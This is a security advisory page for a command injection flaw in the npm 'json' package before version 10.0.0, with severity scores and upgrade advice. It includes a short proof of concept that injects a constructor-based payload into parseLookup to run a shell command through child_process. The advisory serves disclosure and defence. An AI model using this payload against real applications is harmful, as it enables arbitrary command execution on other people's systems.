Command Injection Affecting json package, versions <10.0.0


0.0
high

Snyk CVSS

    Exploit Maturity Proof of concept
    Attack Complexity Low
    Privileges Required High
    Confidentiality High
    Integrity High
    Availability High
Expand this section
NVD
7.2 high

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-JSON-597481
  • published 30 Aug 2020
  • disclosed 6 Aug 2020
  • credit po6ix

How to fix?

Upgrade json to version 10.0.0 or higher.

Overview

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbritary commands using the parseLookup function.

PoC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}'); console.log(res);

References